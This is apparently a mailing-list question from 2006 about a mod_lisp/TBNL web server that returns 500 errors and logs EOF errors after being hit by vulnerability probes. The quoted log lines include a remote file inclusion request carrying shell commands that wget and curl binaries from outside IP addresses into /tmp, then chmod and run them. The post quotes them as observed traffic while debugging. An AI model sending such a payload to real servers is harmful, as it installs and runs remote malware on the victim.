Every now and then I get hit by a sudden probe of various web script
vulnerabilities. The requests look like this:
POST /xmlrpc/xmlrpc.php
POST /blogs/xmlsrv/xmlrpc.php
GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo|
After these things happen, the connection between mod_lisp and tbnl
starts to fail with this message in the apache logs:
[Wed Apr 05 08:19:50 2006] [error] (70014)End of file found: error reading from Lisp
[Wed Apr 05 08:19:51 2006] [error] (70014)End of file found: error reading from Lisp
Making requests to the website results in a 500 Internal Server Error.
I have looked at the listener object when this happens, and it seems
to have 10 workers. After a few more requests (all 500 errors), the
worker count drops down, and then suddenly things start working
normally again.
What might be happening with the connection in this situation? Is
there anything in the listener object I can inspect to discover why
the mod_lisp connection is getting EOF?
Zach